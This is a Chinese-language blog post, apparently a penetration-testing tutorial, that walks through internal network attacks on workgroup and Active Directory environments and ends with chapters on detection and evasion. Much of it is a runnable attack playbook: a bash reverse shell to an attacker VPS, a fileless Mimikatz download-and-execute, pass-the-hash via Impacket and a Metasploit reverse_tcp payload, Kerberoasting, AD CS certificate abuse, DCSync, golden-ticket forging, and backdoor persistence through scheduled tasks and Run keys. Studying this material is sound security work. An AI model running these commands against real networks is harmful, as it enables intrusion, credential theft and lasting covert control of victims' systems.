欢迎来到我的网安花园

这里记录我的代码、思考与生活碎片。请探索更多内容吧!

今日更新:2篇文章

内网渗透测试技术详解:工作组与域环境下的攻击链、工具及防御规避

第一章:内网渗透测试基础理论

1.1 内网渗透测试定义与目标

内网渗透测试(Internal Network Penetration Testing)是一种模拟恶意攻击者在突破企业网络边界、获得内网中某个立足点后,为进一步扩大战果、窃取核心数据或控制关键系统而发起的一系列攻击行为的安全评估方法。与外网渗透测试侧重于发现和利用面向互联网的边界服务漏洞不同,内网渗透测试的核心在于后渗透(Post-Exploitation)阶段,即假设攻击者已经“身处内网”。
其主要目标包括:
1.信息收集: 摸清内网的网络拓扑、资产分布、用户结构、服务配置等
2.权限提升: 将初始获得的低权限(如普通用户)提升至更高权限(如本地管理员、域管理员)
3.横向移动: 以已控主机为跳板,在内网中移动,控制更多的服务器、工作站等设备
4.持久化访问: 在目标网络中建立长期、隐蔽的访问通道,确保即使在系统重启或凭证变更后仍能保持控制
5.达成最终目标: 根据测试目的,可能包括窃取敏感数据、控制核心业务系统、攻陷域控制器等

1.2 攻击链模型(Kill Chain)在内网中的应用

内网渗透测试遵循一个逻辑清晰的攻击链模型,每个环节环环相扣。虽然初始访问(Initial Access)通常被视为外网渗透的范畴,但在内网测试中,我们通常从一个已有的立足点开始,其后续阶段可概括为:
1.立足点(Foothold)/命令与控制(C2): 攻击者通过初始访问获得内网中一台主机的控制权,并建立与外部C2服务器的通信
2.信息收集与环境感知(Reconnaissance & Enumeration): 收集当前主机的系统信息、网络配置、用户信息,并扫描探测内网中的其他存活主机、开放端口、运行服务等
3.权限提升(Privilege Escalation): 在当前主机上,利用系统漏洞、配置错误等手段,将权限从普通用户提升为管理员或SYSTEM权限
4.凭证窃取(Credential Access): 利用Mimikatz等工具从内存、注册表或系统文件中抓取明文密码、哈希值、Kerberos票据等敏感凭证
5.横向移动(Lateral Movement): 利用窃取到的凭证或各种远程执行技术,从一台主机移动到另一台主机,逐步扩大控制范围
6.持久化(Persistence): 在关键主机上设置后门、计划任务、服务等,以维持长期控制
7.达成目标(Actions on Objectives): 在控制了足够权限和资产后,执行最终攻击目标

1.3 内网环境分类:工作组 vs. 域

内网环境根据其管理模式主要分为工作组两种,它们的结构和安全特性截然不同,导致渗透测试的策略和技术也大相径庭。

工作组(Workgroup)

特点: 一种去中心化的网络模式,网络中的计算机地位对等,没有集中的管理服务器。每台计算机独立管理自己的用户账户和安全策略。
认证方式: 本地认证。当一台计算机试图访问另一台计算机的资源时,需要提供目标计算机上存在的合法账户凭证。
攻击思路: 渗透的核心在于“逐点突破”。攻击者需要在一台台主机上收集信息、提权、抓取本地凭证,然后利用这些凭证尝试登录其他主机,像是在一个平面网络中不断“横跳”。横向移动的成功率高度依赖于网络中是否存在密码复用或弱密码的情况。

域(Active Directory Domain)

特点: 一种集中化的网络管理模式,其核心是 活动目录(Active Directory, AD)。域控制器(Domain Controller, DC)存储和管理整个域的用户账户、计算机账户、组策略(GPO)等信息,实现统一的身份认证和权限控制。
认证方式: 集中认证。用户登录域内任何一台计算机,其凭证都会被发送到域控制器进行验证。域内的资源访问基于Kerberos或NTLM协议进行认证。
攻击思路: 渗透的目标是“擒贼先擒王”。攻击者一旦进入域环境,首要目标不再是单个主机,而是整个域的控制权。攻击的核心思路是利用域内的信任关系和协议机制,通过信息收集(如使用BloodHound绘制攻击路径、利用域内配置漏洞(如AD CS、委派)、攻击认证协议(如Kerberoasting),最终获取域管理员权限,从而控制整个域网络。

第二章:工作组(Workgroup)环境渗透测试

工作组环境因其“各自为政”的特性,渗透测试过程更像是一场“游击战”。攻击者需要不断地在单台主机上进行深度挖掘,并寄希望于找到可以通往下一台主机的“钥匙”。

2.1 工作组环境特点与攻击面分析

安全边界模糊: 没有统一的安全策略,各主机的安全水平参差不齐,容易出现配置薄弱的突破口。
凭证管理混乱: 用户为了方便,极有可能在多台机器上使用相同的用户名和密码,这为横向移动创造了绝佳条件。
攻击依赖本地信息: 无法像在域中一样通过查询AD来获取全局信息,攻击者必须在每台主机上重复信息收集的过程。
横向移动手段多样: 常用的远程管理协议和工具,如SMB、WMI、PsExec等,是横向移动的主要载体。

2.2 案例研究:从Webshell到控制多台主机

场景假设: 某公司内部网络为一个工作组环境。攻击者通过利用对外Web服务器(192.168.1.10)上的应用漏洞,成功上传了一个Webshell,获得了www-data低权限。

2.2.1 阶段一:初始访问与立足点建立

在攻击者VPS上监听端口
nc -lvnp 4444
通过Webshell执行反弹shell命令(以bash为例)
bash -i >& /dev/tcp/your_vps_ip/4444 0>&1

至此,攻击者在Web服务器上有了一个稳定的立足点(当然,也可以通过webshell进行管理,接下来是Windows或Linux的指令,类比即可)。

2.2.2 阶段二:信息收集与环境感知

在获得shell后,首要任务是了解当前环境。
本机信息收集(括号外为windows,括号内为linux):

查看系统信息
systeminfo (uname -a)
查看网络配置
ipconfig /all (ifconfig或ip a)
结果显示IP为192.168.1.10,位于192.168.1.0/24网段
查看当前用户和权限
whoami
结果为:nt authority\network service (root)
查看正在运行的进程和服务
tasklist /svc (ps aux)

内网存活主机探测(可以在初始立足点进行sock代理,用来将流量转发到目标内网):

使用arp-scan探测(如果能安装或上传)
arp-scan.exe --localnet
或者使用简单的ICMP扫描
for /L %i IN (1,1,254) DO @ping -n 1 -w 200 192.168.1.%i | findstr "TTL="
扫描发现存活主机:192.168.1.1 (网关), 192.168.1.20 (PC-Tom), 192.168.1.25 (PC-Jerry)

端口和服务扫描:

上传nmap.exe
nmap -sS -p- -T4 192.168.1.20,192.168.1.25
扫描结果显示,192.168.1.20和192.168.1.25都开放了135 (RPC), 139 (NetBIOS), 445 (SMB) 端口。

2.2.3 阶段三:本地权限提升

当前权限network service太低,需要提升至SYSTEM。攻击者会使用提权辅助脚本(如winPEAS.exe)来查找提权向量,例如未打补丁的内核漏洞、不安全的系统服务配置等。
假设: 攻击者发现了一个可利用的Windows内核漏洞CVE-2025-62215 。这是一个本地提权漏洞,允许攻击者从普通用户权限提升到SYSTEM权限。攻击者上传并执行了针对该漏洞的利用程序(Exploit)。

执行提权EXP
CVE-2025-62215-exploit.exe

现在,攻击者完全控制了Web服务器(192.168.1.10)。

2.2.4 阶段四:凭证窃取

拥有SYSTEM权限后,首要目标是从内存中抓取凭证。Mimikatz是此阶段的不二之选。攻击者会上传Mimikatz并执行。

使用PowerShell无文件加载Mimikatz
IEX (New-Object Net.WebClient).DownloadString('http://your_vps_ip/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds

或者直接执行exe:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
结果: Mimikatz成功从LSASS进程中抓取到了一个本地管理员账户的NTLM哈希:Administrator:500:aad3b435b51404eeaad3b435b51404ee:3edc68a5debd735545ddf69fb3c224a8。同时,可能还会抓取到一些其他登录过本机的用户的明文密码或哈希。

2.2.5 阶段五:横向移动

现在,攻击者手握Web服务器的管理员哈希,并知道内网中还有两台主机(192.168.1.20, 192.168.1.25)。由于工作组环境中密码复用的可能性很高,攻击者将尝试用这个凭证去攻击其他主机。
方法一:利用IPC和SMB(PTH,pass-the-hash哈希传递)
(Inter-Process Communication Share)是Windows提供的一个空会话连接,常被用于远程管理和文件共享。攻击者可以利用它建立连接,然后拷贝文件和执行命令 。

使用net use建立到目标主机的IPC$连接(由于没有明文密码,此方法在原生cmd中不可行,需要借助工具)
使用Impacket工具集中的psexec.py进行哈希传递攻击
在攻击者自己的机器上,通过代理进入内网
proxychains python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3edc68a5debd735545ddf69fb3c224a8 Administrator@192.168.1.20
如果成功,将获得192.168.1.20的交互式shell
也可以使用Metasploit的psexec模块:
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.20
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:3edc68a5debd735545ddf69fb3c224a8
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vps_ip
exploit

方法二:利用WMI (Windows Management Instrumentation)
WMI是Windows强大的管理框架,可以远程执行命令,且行为比PsExec更隐蔽 。

使用Impacket工具集中的wmiexec.py进行哈希传递
proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3edc68a5debd735545ddf69fb3c224a8 Administrator@192.168.1.20 "ipconfig"
使用PowerShell脚本Invoke-WMIExec.ps1
Invoke-WMIExec -Target 192.168.1.20 -Username Administrator -Hash 3edc68a5debd735545ddf69fb3c224a8 -Command "whoami"
使用vbs脚本wmiexec.vbs
cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.20 Administrator Password123 "ipconfig"

方法三:利用WinRM (Windows Remote Management)
如果目标主机开启了WinRM服务(PowerShell远程管理),也可以进行横向移动 。

需要明文密码
$password = ConvertTo-SecureString "Password123" -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential("Administrator", $password)
Enter-PSSession -ComputerName 192.168.1.20 -Credential $credential

攻击流程: 攻击者使用wmiexec.py成功以哈希传递的方式控制了192.168.1.20 (PC-Tom)。接着,在PC-Tom上再次运行Mimikatz,抓取到了用户Tom的明文密码 Tom:Summer2025!。随后,攻击者尝试使用Administrator的哈希和Tom的密码去攻击192.168.1.25 (PC-Jerry),最终发现PC-Jerry也使用了相同的管理员哈希。至此,攻击者控制了内网中的三台主机。

2.2.6 阶段六:持久化

为了长期控制这些主机,攻击者会在每台主机上创建持久化后门。

创建计划任务:schtasks /create /tn "Windows Update Service" /tr "c:\windows\temp\backdoor.exe" /sc onstart /ru SYSTEM
修改注册表启动项:reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "CriticalUpdate" /t REG_SZ /d "c:\windows\temp\backdoor.exe"

通过这些手段,即使主机重启,后门程序也会自动运行,攻击者可以随时重新连接。

第三章:域(Active Directory)环境渗透测试

域环境的渗透测试更像是一场“信息战”和“权谋战”,核心在于理解和利用AD复杂的信任关系和认证机制。

3.1 域环境核心概念与攻击向量

域控制器(DC): 域的核心,负责认证、授权、策略分发。拿下DC等于拿下整个域。
活动目录(AD): 存储所有域对象(用户、计算机、组等)的数据库。
Kerberos协议: 域环境默认的认证协议,涉及KDC(密钥分发中心)、TGT(票据授予票据)、TGS(服务票据)等概念,是许多高级攻击(如黄金票据、白银票据、Kerberoasting)的基础。
组策略(GPO): 强大的配置管理工具,可被滥用来分发恶意软件或修改配置。
信任关系(Trusts): 域与域之间的关系,可能成为跨域攻击的跳板。

3.2 案例研究:从普通域用户到域控(Domain Admin)

场景假设:攻击者通过钓鱼邮件,获取了某公司CONTOSO.corp域内普通用户j.smith的密码 Welcome123!。攻击者通过VPN进入了公司内网,并使用该凭证登录了一台普通员工主机WORKSTATION-01。

3.2.1 阶段一:初始访问与信息收集

基础域信息收集:

查看当前用户信息
whoami /all
查看域信息
net config workstation
显示域为 CONTOSO.corp
查询域控制器
nltest /dsgetdc:CONTOSO.corp
结果显示DC为 DC01.contoso.corp (10.10.1.5)
查询域管理员
net group "Domain Admins" /domain

使用PowerView进行深度枚举:PowerView是PowerSploit套件中的一个强大的PowerShell工具,用于深度查询AD。

导入PowerView
. .\PowerView.ps1
获取域中所有用户对象
Get-NetUser
获取域中所有计算机对象
Get-NetComputer
寻找对本地主机有管理员权限的域用户
Find-LocalAdminAccess
查找所有GPO
Get-NetGPO

使用BloodHound进行攻击路径分析:
BloodHound是可视化AD攻击路径的神器。它通过收集器(SharpHound)收集AD信息,然后在图形界面中展示谁能控制谁。

在WORKSTATION-01上运行SharpHound收集数据
SharpHound.exe -c All -d CONTOSO.corp --zipfilename loot.zip
将生成的loot.zip文件下载到攻击者本地,并导入BloodHound GUI

BloodHound分析结果可能直接显示出一条从j.smith到域管理员权限的攻击路径,例如:j.smith是某个本地管理员组的成员,该组的另一个成员svc_admin的密码保存在一个共享文件夹中,而svc_admin又对DC有写入权限。

3.2.2 阶段二:权限提升与凭证获取

在信息收集的基础上,攻击者可以尝试多种方法来提升权限。
本地提权:利用新发现的内核漏洞
假设WORKSTATION-01是一台未及时打补丁的Windows Server 2022。攻击者发现其存在CVE-2025-29824漏洞 ,这是一个位于通用日志文件系统(CLFS)驱动中的零日漏洞,允许本地用户提权至SYSTEM。攻击者上传并执行PoC,成功在WORKSTATION-01上获得了SYSTEM权限。
Kerberoasting攻击
Kerberoasting是一种利用Kerberos协议来破解服务账户密码的技术。如果一个服务账户(通常用于运行SQL Server、IIS等服务)的SPN(Service Principal Name)被注册,任何域用户都可以为其请求服务票据(TGS)。该票据的一部分是用服务账户的NTLM哈希加密的。攻击者可以离线爆破这个哈希,如果服务账户密码很弱,就可能被破解。

使用Rubeus进行Kerberoasting
Rubeus.exe kerberoast /outfile:hashes.txt
将hashes.txt下载到本地,使用hashcat进行爆破
hashcat -m 13100 -a 0 hashes.txt /path/to/wordlist.txt
假设成功破解了一个SQL服务账户 sql_svc 的密码:SuperSecurePwd!@#

攻击者检查sql_svc的权限,发现它是一个域管理员。游戏结束
利用AD CS(证书服务)配置错误
如果Kerberoasting失败,攻击者继续寻找其他路径。BloodHound显示域内配置了Active Directory证书服务(AD CS),并且存在一个名为"WebServerCert"的证书模板存在ESC8配置漏洞。该漏洞允许任何用户申请一个证书,并在证书请求中指定一个“主题备用名称”(SAN),从而可以冒充其他任何用户,包括域管理员。

使用Certipy工具来利用此漏洞
1. 请求一个证书,并指定冒充域管理员 a.jones
certipy-ad cert -user 'j.smith' -p 'Welcome123!' -ca 'CONTOSO-CA' -template 'WebServerCert' -upn 'a.jones@contoso.corp'
2. 将获取到的证书转换为.pfx文件
3. 使用该证书进行PTT(Pass-the-Ticket)攻击,获取a.jones的TGT
certipy-ad auth -pfx a.jones.pfx -dc-ip 10.10.1.5
4. 将获取到的Kerberos票据注入到当前会话中
Rubeus.exe ptt /ticket:ticket.kirbi

注入票据后,当前shell就拥有了域管理员a.jones的权限。

3.2.3 阶段三:横向移动与域控突破

现在攻击者拥有了域管理员的权限(或票据),可以直接攻击域控制器。
DCSync攻击
拥有特定权限(Replicating Directory Changes All和Replicating Directory Changes)的账户可以模拟一个DC,向主DC请求所有域用户的密码哈希数据。域管理员默认拥有此权限。这是获取域内所有凭证的终极手段。

使用Mimikatz进行DCSync
mimikatz.exe "lsadump::dcsync /domain:contoso.corp /all /csv" "exit"
或者只抓取krbtgt用户的哈希,用于制作黄金票据
mimikatz.exe "lsadump::dcsync /domain:contoso.corp /user:krbtgt" "exit"

攻击者成功获取了krbtgt账户的NTLM哈希。
远程登录DC
拥有域管权限后,可以直接使用各种工具远程登录DC。

使用psexec.py
python3 psexec.py contoso.corp/a.jones:SuperSecurePwd!@#@10.10.1.5
或者使用注入的票据
export KRB5CCNAME=/path/to/a.jones.ccache
python3 psexec.py -k -no-pass 10.10.1.5

攻击者成功获得了DC01的SYSTEM权限shell。

3.2.4 阶段四:持久化与目标达成

黄金票据(Golden Ticket)
黄金票据是Kerberos攻击的巅峰之作。利用DCSync获取的krbtgt账户哈希,攻击者可以伪造任意用户的TGT(票据授予票据)。这个TGT是域内认证的“万能钥匙”,可以用来访问域内任何资源,并且可以设置超长有效期,是终极的持久化后门。只要krbtgt的密码不被重置两次,黄金票据就一直有效。

使用Mimikatz制作黄金票据
需要:/domain, /sid, /krbtgt (哈希), /user (想伪造的用户名), /id (可选)
mimikatz.exe "kerberos::golden /domain:contoso.corp /sid:S-1-5-21-xxxx /krbtgt:xxxxxxxx /user:god_mode /ticket:golden.tck" "kerberos::ptt golden.tck" "exit"

至此,攻击者可以随时随地以god_mode(或任何自定义的)用户身份,带着域管理员权限重返该网络,实现了完全和持久的控制。

第四章:核心工具与后渗透框架深度解析

内网渗透的成功离不开强大的工具支持。不同的框架各有侧重,适用于不同的阶段和场景。

4.1 Metasploit Framework: 漏洞利用的瑞士军刀

优势
拥有全球最大的公开漏洞利用模块库,是进行初始访问和本地提权的利器。
Meterpreter会话功能强大,提供了丰富的文件操作、进程迁移、端口转发等后渗透功能。
模块化设计,扩展性强,社区活跃。
劣势
对于大规模内网横向移动的管理较为笨拙,一次只能处理一个shell,不适合团队作战 。
特征较为明显,容易被杀毒软件和EDR检测。
实际使用场景
利用已知漏洞获取初始立足点。
执行本地权限提升漏洞利用。
作为跳板,将流量转发给其他工具(如Cobalt Strike)。

4.2 Cobalt Strike: 团队协作与APT模拟利器

优势
专为后渗透和高级持续性威胁(APT)模拟设计,尤其擅长团队协作。
强大的C2(命令与控制)功能,其Beacon载荷提供了高度可定制的通信协议和隐蔽性。
图形化界面直观,可以方便地管理大量受控主机,可视化内网拓扑和攻击路径。
集成了大量内网渗透技术,如各种横向移动模块、凭证窃取、端口扫描等。
劣势
商业软件,价格昂贵。
漏洞利用能力远不如Metasploit,通常需要与其他工具配合使用。
实际使用场景
在获得初始立足点后,派生一个Beacon会话,进行长期的、隐蔽的内网渗透。
团队协同作战,多人同时在内网中进行不同方向的渗透。
模拟特定APT组织的攻击手法,进行红蓝对抗演练。

4.3 Empire: 基于PowerShell的隐蔽控制框架

优势
纯粹基于PowerShell,大量利用了无文件落地技术,隐蔽性极强。
深度集成PowerSploit和PowerView等著名PowerShell攻击库,对Windows域环境的渗透能力尤其突出。
模块丰富,覆盖信息收集、提权、横向移动、持久化等各个方面。
劣势
对PowerShell的依赖使其在非Windows环境或PowerShell被严格限制的环境中作用有限。
项目曾一度停止维护,虽然现在有社区接手,但更新和稳定性可能不如商业软件。
实际使用场景
在对隐蔽性要求极高的渗透测试中,作为主要的C2框架。
当目标环境对PowerShell脚本执行没有严格限制时,可以发挥巨大威力。

4.4 Impacket工具集: 网络协议交互的艺术

Impacket本身不是一个框架,而是一个Python类的集合,用于处理网络协议。但基于它开发的脚本工具(如psexec.py, wmiexec.py, smbexec.py, dcomexec.py , secretsdump.py)在内网渗透中不可或缺。它们是执行哈希传递、票据传递等攻击的命令行利器,轻量、高效,是许多自动化渗透脚本的核心组件。

4.5 工具选择与组合策略

Metasploit用于打点,获取第一个shell。
立即通过漏洞利用或进程注入,将控制权转移给Cobalt Strike的Beacon,以便进行隐蔽的长期控制和团队协作。
在CS的Beacon中,根据需要执行Empire的PowerShell模块或Impacket的脚本,来进行特定的信息收集或横向移动。
使用Mimikatz、PowerView、BloodHound等专用工具获取关键信息和凭证,为下一步行动提供决策支持。

第五章:防御、检测与规避技术

攻与防总是相辅相成的。了解防御方的检测手段,是攻击方提升隐蔽性的前提。

5.1 常见的防御与检测机制

日志审计
机制: Windows事件日志(特别是安全日志4624/4625登录、4688进程创建、4768/4769 Kerberos票据请求等)是检测异常行为的基础。SIEM(安全信息和事件管理)系统会汇总分析这些日志,发现可疑模式。
检测点: 短时间内大量失败的登录尝试(密码喷洒)、从非管理终端到服务器的远程登录、非标准时间的用户登录、PowerShell等高危进程的异常调用。
终端检测与响应(EDR)
机制: EDR在终端上监控进程活动、文件操作、网络连接和内存变化,通过行为分析来识别恶意活动,而不是仅仅依赖签名 。
检测点: lsass.exe进程的异常访问(Mimikatz抓密码)、无文件攻击(PowerShell执行恶意代码)、横向移动工具(PsExec, WMI)的调用、内核漏洞利用的尝试。
网络流量分析(NTA)
机制: 通过监控网络流量,检测异常的通信模式。例如,IDS/IPS(入侵检测/防御系统)会检查流量中的恶意载荷签名 。
检测点: C2通信流量(如不常见的端口、周期性的心跳包)、内网大规模端口扫描、SMB/RPC协议的异常利用。

5.2 高级规避技术

为了绕过上述检测,攻击者发展出了多种规避技术。
“就地取材”(Living-off-the-Land, LOLBins)
技术核心: 这是目前最流行、最有效的规避技术之一。攻击者不再使用自己携带的恶意软件,而是利用操作系统内置的、合法的、有数字签名的程序(LOLBins)来完成攻击任务。因为这些都是系统正常工具,其行为很难被定义为绝对恶意 。
示例:
PowerShell (powershell.exe): 用于执行无文件攻击、内存加载、信息收集 。
WMI命令行工具 (wmic.exe): 用于远程命令执行,替代PsExec 。
证书工具 (certutil.exe): 可用于下载文件、编码/解码数据,伪装成正常证书操作。
BITSAdmin (bitsadmin.exe): 后台智能传输服务,可用于隐蔽地下载文件。
规避效果: 极大地增加了检测的难度,防御方必须依赖上下文行为分析,而不能简单地阻止某个程序的运行。
EDR与AV绕过
内存加载/反射式注入: 将恶意代码(如DLL)直接加载到内存中执行,避免在磁盘上留下文件痕迹,从而绕过基于文件的静态扫描 。
混淆与加密: 对PowerShell脚本、C#载荷等进行多层编码、混淆和加密,使静态分析引擎无法识别其真实意图 。
禁用或干扰EDR: 更高级的攻击者会尝试直接攻击EDR的Agent,例如通过内核驱动卸载其钩子,或干扰其事件收集管道 。
日志清理与混淆
日志清理: 攻击者在获得高权限后,可能会尝试清理Windows事件日志,以抹去痕迹 。但这一行为本身就非常可疑,容易触发警报。
日志混淆: 更高明的做法是在攻击过程中产生大量“正常”的日志,将恶意行为淹没在日志海洋中,增加安全分析师的溯源难度。
网络流量混淆
C2流量伪装: 将C2通信流量封装在常见的协议中,如DNS(DNS-over-HTTPS)、HTTPS、ICMP等,使其看起来像正常的网络请求,从而绕过防火墙和流量检测 。
域前置(Domain Fronting): 利用高信誉的CDN服务(如Cloudflare, Akamai)作为C2流量的中转站,防御方看到的只是与合法CDN的通信,无法轻易封禁。

第六章:总结与未来趋势

内网渗透测试是一个复杂且不断演进的领域。从工作组的“单点突破,密码复用”到域环境的“信息为王,巧用协议”,攻击者的方法论和工具链都在持续升级。工作组环境的安全性依赖于每台主机的配置和用户的安全意识,而域环境的安全性则是一个体系化的工程,任何一个环节——从一个普通的员工账户,到一个被遗忘的服务,再到一个证书模板的错误配置——都可能成为“千里之堤,溃于蚁穴”的那个蚁穴。
未来趋势展望
混合环境的挑战: 随着越来越多的企业采用云服务,本地AD与Azure AD等云身份提供商的混合环境将成为新的主要攻击面。针对混合身份认证、跨云地同步机制的攻击将日益增多。
自动化与AI的介入: 攻击工具将更加自动化,能够自动发现和利用攻击路径。BloodHound已经展示了图论在攻击路径规划中的威力,未来可能会有更智能的工具出现。同时,防御方也将越来越多地采用AI和机器学习技术来分析海量数据,识别异常行为。
‍“零信任”架构的普及: 传统的基于边界的防御模型正在被“零信任”(Zero Trust)架构所取代。在零信任模型下,任何来自内网的访问请求都必须经过严格的认证和授权,这将极大地增加横向移动的难度。
规避技术持续升级: LOLBins的利用将更加普遍和深入,攻击者会不断挖掘新的系统原生工具用于攻击。同时,直接在硬件或固件层面进行持久化的攻击(如UEFI后门)也可能成为新的威胁方向。
总而言之,内网安全攻防对抗将是一场永无止境的“猫鼠游戏”。对于安全从业者而言,只有不断学习最新的攻击技术,才能构建出更加坚固有效的防御体系。

posted @ 2026-01-24 16:25  guaidao2  阅读(0)  评论(0)    收藏  举报